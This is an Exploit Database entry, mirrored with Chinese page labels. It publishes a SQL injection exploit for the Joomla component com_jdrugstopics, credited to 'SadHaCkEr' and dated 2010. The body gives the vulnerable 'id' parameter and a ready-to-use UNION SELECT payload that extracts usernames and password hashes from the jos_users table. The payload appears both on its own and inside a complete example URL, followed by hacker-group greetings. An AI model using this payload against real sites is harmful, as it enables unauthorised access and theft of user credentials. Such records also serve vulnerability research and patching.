Joomla! Component com_jdrugstopics – SQL Injection

• Exploit Database
• 7 阅读

• 作者： SadHaCkEr
  日期： 2010-04-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12183/

• # Title: Joomla Component com_jdrugstopics SQL Injection Vulnerability 
  # Author: SadHaCkEr
  # Data: 2010-04-12
   
  [~]######################################### InformatioN #############################################[~]
  
  #AUTHOR:SadHaCkEr
  #Email: n5s@hotmail.[choose ANY ONE] IF U luckyU will Find Me 
  #Website: http://www.sadx.297m.com/
  #Forum :http://v4-team.net/cc
  
  [~]######################################### ExploiT #############################################[~]
  
  [~] Vulnerable:
  
  http://127.0.0.1/index.php?option=com_jdrugstopics&view=drugsdetails&id=[SQL]
  
  [~] ExploiT :
  
  -226 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13 from jos_users--
  
  [~] Example :
  
  http://127.0.0.1/index.php?option=com_jdrugstopics&view=drugsdetails&id=
  -226 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13 from jos_users--
  
   
   
  [~]######################################### ThankS To ... ############################################[~]
  
  [~] Special Thanks 2 :
  
  RoMaNcYxHaCkEr, Mr.Safa7, Mn7oS & Sniper Code & Red Virus & HCJ & Mr.Wolf & ayaster & All Trayg Member .
  
  [~] Trayg Team + V4-Team + SVT Team 
  
  [~] GreetZ 2: My LoV3r + My Keyboard
   
  [~]#########################################./Done #############################################[~]